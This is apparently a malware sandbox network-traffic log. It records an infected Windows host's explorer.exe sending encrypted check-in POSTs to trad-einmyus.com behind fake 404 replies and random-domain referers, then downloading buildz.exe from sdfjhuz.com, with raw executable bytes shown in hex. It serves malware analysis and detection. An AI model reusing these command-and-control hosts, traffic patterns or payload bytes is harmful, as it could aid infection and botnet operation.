                                                                                                                                                                                                                                      Mar 28, 2024 17:50:14.823796988 CET578INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                      server: nginx/1.20.2
                                                                                                                                                                                                                                      date: Thu, 28 Mar 2024 16:50:14 GMT
                                                                                                                                                                                                                                      content-type: text/html; charset=utf-8
                                                                                                                                                                                                                                      transfer-encoding: chunked
                                                                                                                                                                                                                                      Data Raw: 31 39 44 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 19D<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:14.836905003 CET286OUTPOST /index.php HTTP/1.1
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Referer: http://twoursfynqoileqq.com/
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                      Content-Length: 254
                                                                                                                                                                                                                                      Host: trad-einmyus.com
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:14.836930990 CET254OUTData Raw: 12 87 f7 99 6b f9 d2 ba c2 39 77 34 79 bd e2 8d 42 1f a9 44 d5 31 19 99 bd 9c ae f0 f3 a2 9b f6 1f c1 5e a8 68 1a bf e7 ea ac f3 dc db 94 13 05 7d f0 6b 92 b4 af aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 9d 66 5d 02 c8 a1 c1 64 23 d6 b3 69
                                                                                                                                                                                                                                      Data Ascii: k9w4yBD1^h}k\Fu$f]d#iB<nw\=R\s'm~0a8-9WusYc~dU1+V]>sPDrhyByj%qJBJR354UM|rtf!@5~7[4I
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:15.081722021 CET137INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      server: nginx/1.20.2
                                                                                                                                                                                                                                      date: Thu, 28 Mar 2024 16:50:14 GMT
                                                                                                                                                                                                                                      content-type: text/html; charset=utf-8
                                                                                                                                                                                                                                      content-length: 0
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:15.084191084 CET284OUTPOST /index.php HTTP/1.1
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Referer: http://fupehafhlnpyou.net/
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                      Content-Length: 347
                                                                                                                                                                                                                                      Host: trad-einmyus.com
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:15.084191084 CET347OUTData Raw: 12 87 f7 99 6b f9 d2 ba c2 39 77 34 79 bd e2 8d 42 1f a9 44 d5 31 19 99 bd 9c ae f0 f3 a2 9b f6 1f c1 5e a8 68 1a bf e7 ea ac f3 dc db 94 13 05 7d f0 6b 92 b4 af aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 9a 66 5d 02 c8 a1 c1 64 5d aa a0 1c
                                                                                                                                                                                                                                      Data Ascii: k9w4yBD1^h}k\Fu$f]d]Sml*m|dUUcjyR%oJYt/G#>GE#ZKsY&1?PNio'Q0IfLD&zHCV2>?5G$k%I%%
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:15.331357002 CET137INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      server: nginx/1.20.2
                                                                                                                                                                                                                                      date: Thu, 28 Mar 2024 16:50:15 GMT
                                                                                                                                                                                                                                      content-type: text/html; charset=utf-8
                                                                                                                                                                                                                                      content-length: 0
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:15.333734035 CET282OUTPOST /index.php HTTP/1.1
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Referer: http://edhynpdtmkea.com/
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                      Content-Length: 262
                                                                                                                                                                                                                                      Host: trad-einmyus.com
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:15.333734035 CET262OUTData Raw: 12 87 f7 99 6b f9 d2 ba c2 39 77 34 79 bd e2 8d 42 1f a9 44 d5 31 19 99 bd 9c ae f0 f3 a2 9b f6 1f c1 5e a8 68 1a bf e7 ea ac f3 dc db 94 13 05 7d f0 6b 92 b4 af aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 9b 66 5d 02 c8 a1 c1 64 25 82 b2 16
                                                                                                                                                                                                                                      Data Ascii: k9w4yBD1^h}k\Fu$f]d%MHxRt^VjffH$tGEtxDoxG5!*"%;:`h5hlLt]p906sZEH"x2ewwL)fuw3,Y,
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:15.573074102 CET137INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      server: nginx/1.20.2
                                                                                                                                                                                                                                      date: Thu, 28 Mar 2024 16:50:15 GMT
                                                                                                                                                                                                                                      content-type: text/html; charset=utf-8
                                                                                                                                                                                                                                      content-length: 0
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:15.575876951 CET281OUTPOST /index.php HTTP/1.1
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Referer: http://rxllolfqvkh.com/
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                      Content-Length: 139
                                                                                                                                                                                                                                      Host: trad-einmyus.com
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:15.575877905 CET139OUTData Raw: 12 87 f7 99 6b f9 d2 ba c2 39 77 34 79 bd e2 8d 42 1f a9 44 d5 31 19 99 bd 9c ae f0 f3 a2 9b f6 1f c1 5e a8 68 1a bf e7 ea ac f3 dc db 94 13 05 7d f0 6b 92 b4 af aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 98 66 5d 02 c8 a1 c1 64 42 80 b3 2b
                                                                                                                                                                                                                                      Data Ascii: k9w4yBD1^h}k\Fu$f]dB+3r$s_]\F)uWuhQ!dFlCf>#\7.<?
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:15.825031042 CET578INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                      server: nginx/1.20.2
                                                                                                                                                                                                                                      date: Thu, 28 Mar 2024 16:50:15 GMT
                                                                                                                                                                                                                                      content-type: text/html; charset=utf-8
                                                                                                                                                                                                                                      transfer-encoding: chunked
                                                                                                                                                                                                                                      Data Raw: 31 39 44 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 19D<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:15.828208923 CET281OUTPOST /index.php HTTP/1.1
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Referer: http://apkbthcutmq.com/
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                      Content-Length: 182
                                                                                                                                                                                                                                      Host: trad-einmyus.com
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:15.828243971 CET182OUTData Raw: 12 87 f7 99 6b f9 d2 ba c2 39 77 34 79 bd e2 8d 42 1f a9 44 d5 31 19 99 bd 9c ae f0 f3 a2 9b f6 1f c1 5e a8 68 1a bf e7 ea ac f3 dc db 94 13 05 7d f0 6b 92 b4 af aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 99 66 5d 02 c8 a1 c1 64 22 ad 99 34
                                                                                                                                                                                                                                      Data Ascii: k9w4yBD1^h}k\Fu$f]d"4K qW,rIh=if\$GfR?D&F47Fi*>*T$,/qgY$H`)]g%
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:16.067440987 CET578INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                      server: nginx/1.20.2
                                                                                                                                                                                                                                      date: Thu, 28 Mar 2024 16:50:15 GMT
                                                                                                                                                                                                                                      content-type: text/html; charset=utf-8
                                                                                                                                                                                                                                      transfer-encoding: chunked
                                                                                                                                                                                                                                      Data Raw: 31 39 44 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 19D<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:16.070019960 CET285OUTPOST /index.php HTTP/1.1
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Referer: http://xkocmvnipxqqfup.org/
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                      Content-Length: 113
                                                                                                                                                                                                                                      Host: trad-einmyus.com
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:16.310921907 CET208INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                      server: nginx/1.20.2
                                                                                                                                                                                                                                      date: Thu, 28 Mar 2024 16:50:16 GMT
                                                                                                                                                                                                                                      content-type: text/html; charset=utf-8
                                                                                                                                                                                                                                      transfer-encoding: chunked
                                                                                                                                                                                                                                      Data Raw: 32 43 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d2 83 40 0d 63 07 ea e8 8f bd a7 5e a0 10 91 60 a2 5f 53 90 1f bf ec 31 e5 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 2CI:82O@c^`_S10


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1192.168.2.649708189.232.22.59804004C:\Windows\explorer.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:20.539083958 CET162OUTGET /dl/buildz.exe HTTP/1.1
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                      Host: sdfjhuz.com
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:21.210280895 CET1286INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Thu, 28 Mar 2024 16:50:21 GMT
                                                                                                                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                                                                                                                      Content-Length: 776192
                                                                                                                                                                                                                                      Last-Modified: Thu, 28 Mar 2024 16:50:03 GMT
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      ETag: "66059fbb-bd800"
                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 a9 eb 64 63 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0c 00 00 e6 00 00 00 68 75 00 00 00 00 00 27 3f 00 00 00 10 00 00 00 00 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 60 76 00 00 04 00 00 2e b2 0c 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 14 61 01 00 50 00 00 00 00 e0 75 00 c8 79 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 01 01 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 56 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 90 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 60 e5 00 00 00 10 00 00 00 e6 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 42 6a 00 00 00 00 01 00 00 6c 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 00 6e 74 00 00 70 01 00 00 08 0a 00 00 56 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 c8 79 00 00 00 e0 75 00 00 7a 00 00 00 5e 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELdchu'?@`v.aPuy8V@.text` `.rdataBjl@@.datantpV@.rsrcyuz^@@
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:21.210349083 CET1286INData Raw: 68 55 f5 40 00 e8 b9 23 00 00 59 c3 68 4a f5 40 00 e8 ad 23 00 00 59 c3 68 3f f5 40 00 e8 a1 23 00 00 59 c3 cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 8b 45 08 80 38 00 75 04 33 c0 5d c3 50 e8 8b 1d 00 00 59 5d c3 55 8b ec f6 45 08 01 56 8b f1
                                                                                                                                                                                                                                      Data Ascii: hU@#YhJ@#Yh?@#YUE8u3]PY]UEVAtV#Y^]UUA;Bu;u3@3]UEUH]UQQuUuRP]UE;Hu;Eu3@3]TAUQueYYT
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:21.210361958 CET308INData Raw: 80 e6 ff ff 50 8d 45 e4 50 8d 45 ec 50 8d 45 e8 50 56 8d 85 80 f6 ff ff 50 68 44 55 41 00 ff 15 98 00 41 00 8b 0d 04 cc b5 00 47 3b f9 72 88 8b fe 8d 04 39 3d 8d 00 00 00 75 66 68 60 55 41 00 ff 15 60 00 41 00 56 8d 45 e8 50 56 8d 85 80 fa ff ff
                                                                                                                                                                                                                                      Data Ascii: PEPEPEPVPhDUAAG;r9=ufh`UA`AVEPVPVAVVEPXApAVPV|AVVPV8APVAG|\t.YuVVhAVVVDA(OtPAbu
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:21.210375071 CET1286INData Raw: 00 8b 4d f4 64 89 0d 00 00 00 00 5f 5e 5b 8b e5 5d c3 56 56 56 56 56 56 56 ff 15 40 00 41 00 56 ff 15 28 00 41 00 56 8d 45 e0 50 56 56 56 ff 15 3c 00 41 00 56 ff 15 48 00 41 00 cc 55 8b ec b8 50 10 00 00 e8 7d 60 00 00 56 57 c7 45 fc ba 61 2a 07
                                                                                                                                                                                                                                      Data Ascii: Md_^[]VVVVVVV@AV(AVEPVVV<AVHAUP}`VWEa*EHEMO?EPE5TEeXiER%EPE4nERlEEEwEuEq<EElE'/E$LKm+g|`eEmOqeE
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:21.392369986 CET1286INData Raw: 0e 50 8d 04 13 50 53 e8 54 0a 00 00 83 c4 0c 83 7e 14 10 89 7e 10 5b 72 04 8b 06 eb 02 8b c6 c6 04 38 00 5f 8b c6 5e 5d c2 08 00 68 f0 55 41 00 e8 87 03 00 00 cc 55 8b ec 56 8b 75 08 83 fe fe 77 4c 39 71 14 73 0b ff 71 10 56 e8 84 00 00 00 eb 2f
                                                                                                                                                                                                                                      Data Ascii: PPST~~[r8_^]hUAUVuwL9qsqV/}tsA;BPj[u!qyr3;^]hUAUUt+yr;ryVr1A^;v2]@SVW}eu
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:21.392394066 CET1286INData Raw: 8d 76 f8 8d 49 00 66 0f 6f 5e 10 83 e9 30 66 0f 6f 46 20 66 0f 6f 6e 30 8d 76 30 83 f9 30 66 0f 6f d3 66 0f 3a 0f d9 08 66 0f 7f 1f 66 0f 6f e0 66 0f 3a 0f c2 08 66 0f 7f 47 10 66 0f 6f cd 66 0f 3a 0f ec 08 66 0f 7f 6f 20 8d 7f 30 7d b7 8d 76 08
                                                                                                                                                                                                                                      Data Ascii: vIfo^0foF fon0v00fof:ffof:fGfof:fo 0}vVfoNvfo^0foF fon0v00fof:ffof:fGfof:fo 0}v|ovfsvs~vfh"@
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:21.392406940 CET1286INData Raw: 8b c8 83 e1 03 74 09 8a 16 88 17 46 47 49 75 f7 c1 e8 02 74 0d 8b 16 89 17 8d 76 04 8d 7f 04 48 75 f3 59 e9 fa fe ff ff 55 8b ec 8b 45 08 85 c0 75 14 e8 b0 24 00 00 c7 00 16 00 00 00 e8 36 24 00 00 33 c0 5d c3 8b 40 0c 83 e0 10 5d c3 cc cc cc cc
                                                                                                                                                                                                                                      Data Ascii: tFGIutvHuYUEu$6$3]@]WVt$L$|$;v;h%vKs3u%pA%vKsvs~v
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:21.392421007 CET1286INData Raw: 8e 08 89 44 8f 08 8b 44 8e 04 89 44 8f 04 8d 04 8d 00 00 00 00 03 f0 03 f8 ff 24 95 74 2a 40 00 8b ff 84 2a 40 00 8c 2a 40 00 9c 2a 40 00 b0 2a 40 00 8b 44 24 0c 5e 5f c3 90 8a 46 03 88 47 03 8b 44 24 0c 5e 5f c3 8d 49 00 8a 46 03 88 47 03 8a 46
                                                                                                                                                                                                                                      Data Ascii: DDD$t*@*@*@*@*@D$^_FGD$^_IFGFGD$^_FGFGFGD$^_$Wte$fofoNfoV fo^0ffOfW f_0fof@fonPfov`fo~pfg@foPfw`fp
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:21.392433882 CET1286INData Raw: ff 70 04 ff 15 b0 00 41 00 85 c0 75 03 83 ce ff 80 7d fc 00 74 07 8b 4d f8 83 61 70 fd 8b c6 eb 02 33 c0 5f 5e 8b e5 5d c3 55 8b ec 83 3d b4 76 4b 00 00 75 07 68 00 7a 41 00 eb 02 6a 00 ff 75 0c ff 75 08 e8 42 ff ff ff 83 c4 0c 5d c3 cc cc cc cc
                                                                                                                                                                                                                                      Data Ascii: pAu}tMap3_^]U=vKuhzAjuuB]W|$n$L$Wtt=u~3tAt#tttyyyyL$ttfu
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:21.392446995 CET1286INData Raw: 2a 00 00 59 59 85 c0 74 06 46 80 3e 00 74 08 47 46 8a 06 84 c0 75 df 80 7d fc 00 74 07 8b 4d f8 83 61 70 fd 8b c7 5f 5e 8b e5 5d c3 55 8b ec b8 28 10 00 00 e8 69 42 00 00 a1 10 7f 41 00 33 c5 89 45 fc 57 8b 7d 08 89 bd ec ef ff ff 85 ff 75 18 e8
                                                                                                                                                                                                                                      Data Ascii: *YYtF>tGFu}tMap_^]U(iBA3EW}uDSVW^-3Y9_}_jSV?xKGT$u+G7
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:21.392461061 CET1286INData Raw: d7 74 19 83 fa fe 74 14 8b ca c1 f9 05 83 e0 1f c1 e0 06 03 04 8d 18 78 4b 00 eb 05 b8 d0 7e 41 00 f6 40 24 7f 75 a9 3b d7 74 19 83 fa fe 74 14 8b c2 c1 f8 05 83 e2 1f c1 e2 06 03 14 85 18 78 4b 00 eb 05 ba d0 7e 41 00 f6 42 24 80 75 81 e8 33 29
                                                                                                                                                                                                                                      Data Ascii: ttxK~A@$u;ttxK~AB$u3) Pjm)YYe) PBEu) PVju6A;u2(H$x(H ( Pj?YY3}( PuEBYYE}


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      2192.168.2.64971081.94.159.197804004C:\Windows\explorer.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:04.332351923 CET282OUTPOST /index.php HTTP/1.1
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
